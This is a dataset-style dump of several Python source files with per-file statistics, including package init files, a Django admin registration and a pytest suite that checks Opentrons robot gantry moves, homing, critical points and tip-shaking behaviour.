| 19.411765 | 45 | 0.663636 | 40 | 330 | 5.075 | 0.275 | 0.325123 | 0.369458 | 0.251232 | 0.369458 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.263636 | 330 | 16 | 46 | 20.625 | 0.835391 | 0 | 0 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.25 | 0.666667 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
82efb027bc78c19f4b0dff30aeae82569cdcb9c4 | 71 | py | Python | .idea/VirtualEnvironment/Lib/site-packages/tests/outcomes/imports/test_import_package_6/random_module/main.py | Vladpetr/NewsPortal | cd4127fbc09d9c8f5e65c8ae699856c6d380a320 | [
"Apache-2.0"
] | null | null | null | .idea/VirtualEnvironment/Lib/site-packages/tests/outcomes/imports/test_import_package_6/random_module/main.py | Vladpetr/NewsPortal | cd4127fbc09d9c8f5e65c8ae699856c6d380a320 | [
"Apache-2.0"
] | 5 | 2021-04-08T22:02:15.000Z | 2022-02-10T14:53:45.000Z | .idea/VirtualEnvironment/Lib/site-packages/tests/outcomes/imports/test_import_package_6/random_module/main.py | Vladpetr/NewsPortal | cd4127fbc09d9c8f5e65c8ae699856c6d380a320 | [
"Apache-2.0"
] | null | null | null | from in1.in2 import main2
from in1 import file
print(main2.x + file.y)
| 17.75 | 25 | 0.760563 | 14 | 71 | 3.857143 | 0.642857 | 0.259259 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 0.15493 | 71 | 3 | 26 | 23.666667 | 0.816667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0.333333 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
82f6ec65f993a55f6c7b326e17d953d15618b5c2 | 206 | py | Python | packages/auto-nlp-deployment/src/deployments/runtimes/docker/__init__.py | fhswf/tagflip-autonlp | f94abb35ed06198567e5d9cbb7abb7e112149d6c | [
"MIT"
] | 4 | 2021-10-05T17:34:02.000Z | 2022-03-23T07:33:19.000Z | packages/auto-nlp-deployment/src/deployments/runtimes/docker/__init__.py | fhswf/tagflip-autonlp | f94abb35ed06198567e5d9cbb7abb7e112149d6c | [
"MIT"
] | 11 | 2022-03-01T14:37:52.000Z | 2022-03-31T05:11:23.000Z | packages/auto-nlp-deployment/src/deployments/runtimes/docker/__init__.py | fhswf/tagflip-autonlp | f94abb35ed06198567e5d9cbb7abb7e112149d6c | [
"MIT"
] | 1 | 2022-01-29T13:32:22.000Z | 2022-01-29T13:32:22.000Z | from .docker_deployment_runtime import DeploymentRuntime # type: ignore
from .docker_deployment_task import DockerDeploymentTask
from .docker_deployment_runtime_config import DockerDeploymentRuntimeConfig
| 51.5 | 75 | 0.898058 | 21 | 206 | 8.47619 | 0.571429 | 0.168539 | 0.337079 | 0.303371 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.07767 | 206 | 3 | 76 | 68.666667 | 0.936842 | 0.058252 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
d2416decf7026081e2e48f6824318ad8880c6618 | 221 | py | Python | ASTNode/__init__.py | peterzheng98/C2Mx | 4c1d8bb69da0bbb88254e60ae48f1cbc00c609c6 | [
"MIT"
] | null | null | null | ASTNode/__init__.py | peterzheng98/C2Mx | 4c1d8bb69da0bbb88254e60ae48f1cbc00c609c6 | [
"MIT"
] | null | null | null | ASTNode/__init__.py | peterzheng98/C2Mx | 4c1d8bb69da0bbb88254e60ae48f1cbc00c609c6 | [
"MIT"
] | null | null | null | from .AbstractASTNode import AbstractASTNode
from .FuncDecl import *
from .CompondStmt import *
from .AbstractType import *
from .VarDecl import *
from .CallExpr import *
from .Literals import *
from .Arithmetic import *
| 24.555556 | 44 | 0.78733 | 25 | 221 | 6.96 | 0.4 | 0.344828 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144796 | 221 | 8 | 45 | 27.625 | 0.920635 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d26b32f3bfef91f96999577e14286dd2ba7d78d7 | 171 | py | Python | students/K33401/Nikitin_Michail/lab2/lab2/tours/admin.py | mexannik1998/ITMO_ICT_WebDevelopment_2020-2021 | b35f80e8439784e1ab24fbe7db82f30864ba9b69 | [
"MIT"
] | null | null | null | students/K33401/Nikitin_Michail/lab2/lab2/tours/admin.py | mexannik1998/ITMO_ICT_WebDevelopment_2020-2021 | b35f80e8439784e1ab24fbe7db82f30864ba9b69 | [
"MIT"
] | null | null | null | students/K33401/Nikitin_Michail/lab2/lab2/tours/admin.py | mexannik1998/ITMO_ICT_WebDevelopment_2020-2021 | b35f80e8439784e1ab24fbe7db82f30864ba9b69 | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import *
admin.site.register(User)
admin.site.register(Tour)
admin.site.register(UsersComments)
admin.site.register(Booked) | 21.375 | 34 | 0.812865 | 24 | 171 | 5.791667 | 0.5 | 0.258993 | 0.489209 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076023 | 171 | 8 | 35 | 21.375 | 0.879747 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
9637183dca6dd336674fa8ad9ed134beb70af9ca | 123 | py | Python | d6tpipe/exceptions.py | Pandinosaurus/d6tpipe | 4ec6c755504f5fe6d5b71e8621375315ce41ad6f | [
"MIT"
] | 184 | 2018-12-28T13:31:52.000Z | 2022-01-27T19:10:24.000Z | d6tpipe/exceptions.py | Pandinosaurus/d6tpipe | 4ec6c755504f5fe6d5b71e8621375315ce41ad6f | [
"MIT"
] | 2 | 2019-04-18T02:59:45.000Z | 2022-01-20T04:15:58.000Z | d6tpipe/exceptions.py | Pandinosaurus/d6tpipe | 4ec6c755504f5fe6d5b71e8621375315ce41ad6f | [
"MIT"
] | 8 | 2019-04-15T01:41:45.000Z | 2020-06-03T17:49:35.000Z | class PullError(Exception):
pass
class PushError(Exception):
pass
class ResourceExistsError(Exception):
pass
| 13.666667 | 37 | 0.739837 | 12 | 123 | 7.583333 | 0.5 | 0.428571 | 0.395604 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186992 | 123 | 8 | 38 | 15.375 | 0.91 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
964ac4f40568300729d610f35b77ec77806165a7 | 101 | py | Python | ViyaCasual/CAS/CASLibraryBase.py | willhaley-bne/ViyaCasual | 9c0ca9b05a9602e67c8d56e2f63eba01e1218e42 | [
"MIT"
] | null | null | null | ViyaCasual/CAS/CASLibraryBase.py | willhaley-bne/ViyaCasual | 9c0ca9b05a9602e67c8d56e2f63eba01e1218e42 | [
"MIT"
] | null | null | null | ViyaCasual/CAS/CASLibraryBase.py | willhaley-bne/ViyaCasual | 9c0ca9b05a9602e67c8d56e2f63eba01e1218e42 | [
"MIT"
] | null | null | null |
class CASLibraryBase(object):
def __init__(self, viya_conn):
self.viya_conn = viya_conn | 20.2 | 34 | 0.70297 | 13 | 101 | 4.923077 | 0.615385 | 0.375 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.207921 | 101 | 5 | 35 | 20.2 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
965ce63760eb0c5a23bd0d17fc15fafb1e7506e8 | 34 | py | Python | layers/modules/__init__.py | xinqi-fan/SL-FMDet | 8e938cefecc758c04f679bbf157773044d4be103 | [
"MIT"
] | 2 | 2022-01-05T10:17:31.000Z | 2022-01-05T10:17:36.000Z | layers/modules/__init__.py | xinqi-fan/Face_Mask_Detection | 8e938cefecc758c04f679bbf157773044d4be103 | [
"MIT"
] | 1 | 2022-03-23T09:41:34.000Z | 2022-03-23T09:41:34.000Z | layers/modules/__init__.py | xinqi-fan/SL-FMDet | 8e938cefecc758c04f679bbf157773044d4be103 | [
"MIT"
] | null | null | null | from .multibox_loss_mask import *
| 17 | 33 | 0.823529 | 5 | 34 | 5.2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 34 | 1 | 34 | 34 | 0.866667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9673d0140036a0a911f3a7862c4b74295b5a90e0 | 17,990 | py | Python | api/tests/opentrons/hardware_control/test_moves.py | mrod0101/opentrons | 6450edb0421f1c2484c292f8583602d8f6fd13b8 | [
"Apache-2.0"
] | null | null | null | api/tests/opentrons/hardware_control/test_moves.py | mrod0101/opentrons | 6450edb0421f1c2484c292f8583602d8f6fd13b8 | [
"Apache-2.0"
] | 2 | 2022-02-15T03:28:35.000Z | 2022-02-28T01:34:18.000Z | api/tests/opentrons/hardware_control/test_moves.py | mrod0101/opentrons | 6450edb0421f1c2484c292f8583602d8f6fd13b8 | [
"Apache-2.0"
] | null | null | null | import mock
import pytest
from opentrons import types
from opentrons import hardware_control as hc
from opentrons.calibration_storage.types import (
DeckCalibration,
SourceType,
CalibrationStatus,
)
from opentrons.hardware_control.types import (
Axis,
CriticalPoint,
OutOfBoundsMove,
MotionChecks,
MustHomeError,
)
from opentrons.hardware_control.robot_calibration import RobotCalibration
async def test_controller_must_home(hardware_api):
abs_position = types.Point(30, 20, 10)
mount = types.Mount.RIGHT
home = mock.AsyncMock()
hardware_api.home = home
await hardware_api.move_to(mount, abs_position)
home.assert_called_once()
async def test_home_specific_sim(hardware_api):
await hardware_api.home()
await hardware_api.move_to(types.Mount.RIGHT, types.Point(0, 10, 20))
# Avoid the autoretract when moving two difference instruments
hardware_api._last_moved_mount = None
await hardware_api.move_rel(types.Mount.LEFT, types.Point(0, 0, -20))
await hardware_api.home([Axis.Z, Axis.C])
assert hardware_api._current_position == {
Axis.X: 0,
Axis.Y: 10,
Axis.Z: 218,
Axis.A: -10,
Axis.B: 19,
Axis.C: 19,
}
async def test_retract(hardware_api):
await hardware_api.home()
await hardware_api.move_to(types.Mount.RIGHT, types.Point(0, 10, 20))
await hardware_api.retract(types.Mount.RIGHT, 10)
assert hardware_api._current_position == {
Axis.X: 0,
Axis.Y: 10,
Axis.Z: 218,
Axis.A: 218,
Axis.B: 19,
Axis.C: 19,
}
async def test_move(hardware_api):
abs_position = types.Point(30, 20, 10)
mount = types.Mount.RIGHT
target_position1 = {
Axis.X: 30,
Axis.Y: 20,
Axis.Z: 218,
Axis.A: -20,
Axis.B: 19,
Axis.C: 19,
}
await hardware_api.home()
await hardware_api.move_to(mount, abs_position)
assert hardware_api._current_position == target_position1
# This assert implicitly checks that the mount offset is not applied to
# relative moves; if you change this to move_to, the offset will be
# applied again
rel_position = types.Point(30, 20, -10)
mount2 = types.Mount.LEFT
target_position2 = {
Axis.X: 60,
Axis.Y: 40,
Axis.Z: 208,
Axis.A: 218, # The other instrument is retracted
Axis.B: 19,
Axis.C: 19,
}
await hardware_api.move_rel(mount2, rel_position)
assert hardware_api._current_position == target_position2
async def test_move_extras_passed_through(hardware_api, monkeypatch):
mock_be_move = mock.AsyncMock()
monkeypatch.setattr(hardware_api._backend, "move", mock_be_move)
await hardware_api.home()
await hardware_api.move_to(types.Mount.RIGHT, types.Point(0, 0, 0))
assert mock_be_move.call_args_list[0][1]["speed"] is None
assert mock_be_move.call_args_list[0][1]["axis_max_speeds"] == {}
mock_be_move.reset_mock()
await hardware_api.move_to(
types.Mount.RIGHT, types.Point(1, 1, 1), speed=30, max_speeds={Axis.X: 10}
)
assert mock_be_move.call_args_list[0][1]["speed"] == 30
assert mock_be_move.call_args_list[0][1]["axis_max_speeds"] == {"X": 10}
mock_be_move.reset_mock()
await hardware_api.move_rel(
types.Mount.LEFT, types.Point(1, 1, 1), speed=40, max_speeds={Axis.Y: 20}
)
assert mock_be_move.call_args_list[0][1]["speed"] == 40
assert mock_be_move.call_args_list[0][1]["axis_max_speeds"] == {"Y": 20}
async def test_mount_offset_applied(hardware_api, is_robot):
await hardware_api.home()
abs_position = types.Point(30, 20, 10)
mount = types.Mount.LEFT
target_position = {
Axis.X: 64,
Axis.Y: 20,
Axis.Z: -20,
Axis.A: 218,
Axis.B: 19,
Axis.C: 19,
}
await hardware_api.move_to(mount, abs_position)
assert hardware_api._current_position == target_position
async def test_critical_point_applied(hardware_api, monkeypatch, is_robot):
await hardware_api.home()
hardware_api._backend._attached_instruments = {
types.Mount.LEFT: {"model": None, "id": None},
types.Mount.RIGHT: {"model": "p10_single_v1", "id": "testyness"},
}
await hardware_api.cache_instruments()
# Our critical point is now the tip of the nozzle
await hardware_api.move_to(types.Mount.RIGHT, types.Point(0, 0, 0))
target_no_offset = {
Axis.X: 0,
Axis.Y: 0,
Axis.Z: 218,
Axis.A: -12, # from pipette-config.json nozzle offset
Axis.B: 19,
Axis.C: 19,
}
assert hardware_api._current_position == target_no_offset
target = {Axis.X: 0, Axis.Y: 0, Axis.A: 0, Axis.C: 19}
assert await hardware_api.current_position(types.Mount.RIGHT) == target
p10_tip_length = 33
# Specifiying critical point overrides as mount should not use nozzle
# offset
await hardware_api.move_to(
types.Mount.RIGHT, types.Point(0, 0, 0), critical_point=CriticalPoint.MOUNT
)
assert hardware_api._current_position == {
Axis.X: 0.0,
Axis.Y: 0.0,
Axis.Z: 218,
Axis.A: -30,
Axis.B: 19,
Axis.C: 19,
}
assert await hardware_api.current_position(
types.Mount.RIGHT, critical_point=CriticalPoint.MOUNT
) == {Axis.X: 0.0, Axis.Y: 0.0, Axis.A: 0, Axis.C: 19}
# Specifying the critical point as nozzle should have the same behavior
await hardware_api.move_to(
types.Mount.RIGHT, types.Point(0, 0, 0), critical_point=CriticalPoint.NOZZLE
)
assert hardware_api._current_position == target_no_offset
await hardware_api.pick_up_tip(types.Mount.RIGHT, p10_tip_length)
# Now the current position (with offset applied) should change
# pos_after_pickup + model_offset + critical point
target[Axis.A] = 218 + 12 + (-1 * p10_tip_length)
target_no_offset[Axis.C] = target[Axis.C] = 2
assert await hardware_api.current_position(types.Mount.RIGHT) == target
# This move should take the new critical point into account
await hardware_api.move_to(types.Mount.RIGHT, types.Point(0, 0, 0))
target_no_offset[Axis.A] = 21
assert hardware_api._current_position == target_no_offset
# But the position with offset should be back to the original
target[Axis.A] = 0
assert await hardware_api.current_position(types.Mount.RIGHT) == target
# And removing the tip should move us back to the original
await hardware_api.move_rel(types.Mount.RIGHT, types.Point(2.5, 0, 0))
await hardware_api.drop_tip(types.Mount.RIGHT)
await hardware_api.home_plunger(types.Mount.RIGHT)
target[Axis.A] = 33 + hc.DROP_TIP_RELEASE_DISTANCE
target_no_offset[Axis.X] = 2.5
target[Axis.X] = 2.5
assert await hardware_api.current_position(types.Mount.RIGHT) == target
await hardware_api.move_to(types.Mount.RIGHT, types.Point(0, 0, 0))
target[Axis.X] = 0
target_no_offset[Axis.X] = 0
target_no_offset[Axis.A] = -12
target[Axis.A] = 0
assert hardware_api._current_position == target_no_offset
assert await hardware_api.current_position(types.Mount.RIGHT) == target
async def test_new_critical_point_applied(hardware_api):
await hardware_api.home()
hardware_api._backend._attached_instruments = {
types.Mount.LEFT: {"model": None, "id": None},
types.Mount.RIGHT: {"model": "p10_single_v1", "id": "testyness"},
}
await hardware_api.cache_instruments()
# Our critical point is now the tip of the nozzle
await hardware_api.move_to(types.Mount.RIGHT, types.Point(0, 0, 0))
target_no_offset = {
Axis.X: 0,
Axis.Y: 0,
Axis.Z: 218,
Axis.A: -12, # from pipette-config.json model offset
Axis.B: 19,
Axis.C: 19,
}
assert hardware_api._current_position == target_no_offset
target = {Axis.X: 0, Axis.Y: 0, Axis.A: 0, Axis.C: 19}
assert await hardware_api.current_position(types.Mount.RIGHT) == target
p10_tip_length = 33
# Specifiying critical point overrides as mount should not use model offset
await hardware_api.move_to(
types.Mount.RIGHT, types.Point(0, 0, 0), critical_point=CriticalPoint.MOUNT
)
assert hardware_api._current_position == {
Axis.X: 0.0,
Axis.Y: 0.0,
Axis.Z: 218,
Axis.A: -30,
Axis.B: 19,
Axis.C: 19,
}
assert await hardware_api.current_position(
types.Mount.RIGHT, critical_point=CriticalPoint.MOUNT
) == {Axis.X: 0.0, Axis.Y: 0.0, Axis.A: 0, Axis.C: 19}
# Specifying the critical point as nozzle should have the same behavior
await hardware_api.move_to(
types.Mount.RIGHT, types.Point(0, 0, 0), critical_point=CriticalPoint.NOZZLE
)
assert hardware_api._current_position == target_no_offset
await hardware_api.pick_up_tip(types.Mount.RIGHT, p10_tip_length)
# Now the current position (with offset applied) should change
# pos_after_pickup + model_offset + critical point
target[Axis.A] = 218 + (12) + (-1 * p10_tip_length)
target_no_offset[Axis.C] = target[Axis.C] = 2
assert await hardware_api.current_position(types.Mount.RIGHT) == target
# This move should take the new critical point into account
await hardware_api.move_to(types.Mount.RIGHT, types.Point(0, 0, 0))
target_no_offset[Axis.A] = 21
assert hardware_api._current_position == target_no_offset
# But the position with offset should be back to the original
target[Axis.A] = 0
assert await hardware_api.current_position(types.Mount.RIGHT) == target
# And removing the tip should move us back to the original
await hardware_api.move_rel(types.Mount.RIGHT, types.Point(2.5, 0, 0))
await hardware_api.drop_tip(types.Mount.RIGHT)
await hardware_api.home_plunger(types.Mount.RIGHT)
target[Axis.A] = 33 + hc.DROP_TIP_RELEASE_DISTANCE
target_no_offset[Axis.X] = 2.5
target[Axis.X] = 2.5
assert await hardware_api.current_position(types.Mount.RIGHT) == target
await hardware_api.move_to(types.Mount.RIGHT, types.Point(0, 0, 0))
target[Axis.X] = 0
target_no_offset[Axis.X] = 0
target_no_offset[Axis.A] = -12
target[Axis.A] = 0
assert hardware_api._current_position == target_no_offset
assert await hardware_api.current_position(types.Mount.RIGHT) == target
async def test_attitude_deck_cal_applied(monkeypatch, loop):
new_gantry_cal = [[1.0047, -0.0046, 0.0], [0.0011, 1.0038, 0.0], [0.0, 0.0, 1.0]]
called_with = None
async def mock_move(
position, speed=None, home_flagged_axes=True, axis_max_speeds=None
):
nonlocal called_with
called_with = position
hardware_api = await hc.API.build_hardware_simulator(loop=loop)
monkeypatch.setattr(hardware_api._backend, "move", mock_move)
deck_cal = RobotCalibration(
deck_calibration=DeckCalibration(
attitude=new_gantry_cal, source=SourceType.user, status=CalibrationStatus()
)
)
hardware_api.set_robot_calibration(deck_cal)
await hardware_api.home()
await hardware_api.move_to(types.Mount.RIGHT, types.Point(0, 0, 0))
assert called_with["X"] == 0.0
assert called_with["Y"] == 0.0
assert called_with["A"] == -30.0
# Check that mount offset is also applied
await hardware_api.move_to(types.Mount.LEFT, types.Point(0, 0, 0))
assert round(called_with["X"], 2) == 34.16
assert round(called_with["Y"], 2) == 0.04
assert round(called_with["Z"], 2) == -30.0
async def test_other_mount_retracted(hardware_api, is_robot):
await hardware_api.home()
await hardware_api.move_to(types.Mount.RIGHT, types.Point(0, 0, 0))
assert await hardware_api.gantry_position(types.Mount.RIGHT) == types.Point(0, 0, 0)
await hardware_api.move_to(types.Mount.LEFT, types.Point(20, 20, 0))
assert await hardware_api.gantry_position(types.Mount.RIGHT) == types.Point(
54, 20, 248
)
async def test_shake_during_pick_up(hardware_api, monkeypatch):
await hardware_api.home()
hardware_api._backend._attached_instruments = {
types.Mount.LEFT: {"model": None, "id": None},
types.Mount.RIGHT: {"model": "p1000_single_v2.0", "id": "testyness"},
}
await hardware_api.cache_instruments()
shake_tips_pick_up = mock.Mock(side_effect=hardware_api._shake_off_tips_pick_up)
monkeypatch.setattr(hardware_api, "_shake_off_tips_pick_up", shake_tips_pick_up)
# Test double shake for after pick up tips
await hardware_api.pick_up_tip(types.Mount.RIGHT, 50)
shake_tip_calls = [mock.call(types.Mount.RIGHT), mock.call(types.Mount.RIGHT)]
shake_tips_pick_up.assert_has_calls(shake_tip_calls)
move_rel = mock.Mock(side_effect=hardware_api.move_rel)
monkeypatch.setattr(hardware_api, "move_rel", move_rel)
# Test shakes in X and Y direction with 0.3 mm shake tip distance
shake_tips_pick_up.reset_mock()
await shake_tips_pick_up(types.Mount.RIGHT)
move_rel_calls = [
mock.call(types.Mount.RIGHT, types.Point(-0.3, 0, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(0.6, 0, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(-0.3, 0, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(0, -0.3, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(0, 0.6, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(0, -0.3, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(0, 0, 20)),
]
move_rel.assert_has_calls(move_rel_calls)
async def test_shake_during_drop(hardware_api, monkeypatch):
await hardware_api.home()
hardware_api._backend._attached_instruments = {
types.Mount.LEFT: {"model": None, "id": None},
types.Mount.RIGHT: {"model": "p1000_single_v1.5", "id": "testyness"},
}
await hardware_api.cache_instruments()
await hardware_api.add_tip(types.Mount.RIGHT, 50.0)
hardware_api.set_current_tiprack_diameter(types.Mount.RIGHT, 30.0)
shake_tips_drop = mock.Mock(side_effect=hardware_api._shake_off_tips_drop)
monkeypatch.setattr(hardware_api, "_shake_off_tips_drop", shake_tips_drop)
# Test single shake after drop tip
await hardware_api.drop_tip(types.Mount.RIGHT)
shake_tips_drop.assert_called_once_with(types.Mount.RIGHT, 30)
move_rel = mock.Mock(side_effect=hardware_api.move_rel)
monkeypatch.setattr(hardware_api, "move_rel", move_rel)
# Test drop tip shake with 25% of tiprack well diameter
# between upper (2.25 mm) and lower limit (1.0 mm)
shake_tips_drop.reset_mock()
await shake_tips_drop(types.Mount.RIGHT, 2.0 * 4)
move_rel_calls = [
mock.call(types.Mount.RIGHT, types.Point(-2, 0, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(4, 0, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(-2, 0, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(0, 0, 20)),
]
move_rel.assert_has_calls(move_rel_calls)
# Test drop tip shake with 25% of tiprack well diameter
# over upper (2.25 mm) limit
shake_tips_drop.reset_mock()
await shake_tips_drop(types.Mount.RIGHT, 2.3 * 4)
move_rel_calls = [
mock.call(types.Mount.RIGHT, types.Point(-2.25, 0, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(4.5, 0, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(-2.25, 0, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(0, 0, 20)),
]
move_rel.assert_has_calls(move_rel_calls)
# Test drop tip shake with 25% of tiprack well diameter
# below lower (1.0 mm) limit
shake_tips_drop.reset_mock()
await shake_tips_drop(types.Mount.RIGHT, 0.9 * 4)
move_rel_calls = [
mock.call(types.Mount.RIGHT, types.Point(-1, 0, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(2, 0, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(-1, 0, 0), speed=50),
mock.call(types.Mount.RIGHT, types.Point(0, 0, 20)),
]
move_rel.assert_has_calls(move_rel_calls)
async def test_move_rel_bounds(hardware_api):
with pytest.raises(OutOfBoundsMove):
await hardware_api.move_rel(
types.Mount.RIGHT, types.Point(0, 0, 2000), check_bounds=MotionChecks.HIGH
)
async def test_move_rel_homing_failures(hardware_api):
await hardware_api.home()
hardware_api._backend._smoothie_driver._homed_flags = {
"X": True,
"Y": True,
"Z": False,
"A": True,
"B": False,
"C": False,
}
# If one axis being used isn't homed, we must get an exception
with pytest.raises(MustHomeError):
await hardware_api.move_rel(
types.Mount.LEFT, types.Point(0, 0, 2000), fail_on_not_homed=True
)
# If an axis that _isn't_ being moved isn't homed, that's fine
await hardware_api.move_rel(
types.Mount.RIGHT, types.Point(0, 0, 2000), fail_on_not_homed=True
)
async def test_current_position_homing_failures(hardware_api):
await hardware_api.home()
hardware_api._backend._smoothie_driver._homed_flags = {
"X": True,
"Y": True,
"Z": False,
"A": True,
"B": False,
"C": True,
}
# If one axis being used isn't homed, we must get an exception
with pytest.raises(MustHomeError):
await hardware_api.current_position(
mount=types.Mount.LEFT,
fail_on_not_homed=True,
)
with pytest.raises(MustHomeError):
await hardware_api.gantry_position(
mount=types.Mount.LEFT,
fail_on_not_homed=True,
)
# If an axis that _isn't_ being moved isn't homed, that's fine
await hardware_api.current_position(
mount=types.Mount.RIGHT,
fail_on_not_homed=True,
)
await hardware_api.gantry_position(
mount=types.Mount.RIGHT,
fail_on_not_homed=True,
)
| 38.60515 | 88 | 0.6806 | 2,688 | 17,990 | 4.334449 | 0.091518 | 0.118016 | 0.101708 | 0.07038 | 0.809115 | 0.784568 | 0.776843 | 0.747232 | 0.733928 | 0.707321 | 0 | 0.039477 | 0.204447 | 17,990 | 465 | 89 | 38.688172 | 0.774595 | 0.109116 | 0 | 0.591623 | 0 | 0 | 0.018702 | 0.001439 | 0 | 0 | 0 | 0 | 0.125654 | 1 | 0 | false | 0.002618 | 0.018325 | 0 | 0.018325 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
969d0b7b3a907eebe96fdcccaf31b71fb9da0988 | 63 | py | Python | pystiche/enc/models/__init__.py | dooglewoogle/pystiche | 14b61123ede2abdb00daaa5b4981de6d7edaf034 | [
"BSD-3-Clause"
] | 129 | 2019-10-04T00:23:54.000Z | 2021-04-24T06:41:37.000Z | pystiche/enc/models/__init__.py | dooglewoogle/pystiche | 14b61123ede2abdb00daaa5b4981de6d7edaf034 | [
"BSD-3-Clause"
] | 334 | 2019-10-01T08:10:44.000Z | 2021-04-25T19:39:09.000Z | pystiche/enc/models/__init__.py | dooglewoogle/pystiche | 14b61123ede2abdb00daaa5b4981de6d7edaf034 | [
"BSD-3-Clause"
] | 32 | 2021-05-05T05:06:18.000Z | 2022-03-17T09:14:47.000Z | from .alexnet import *
from .utils import *
from .vgg import *
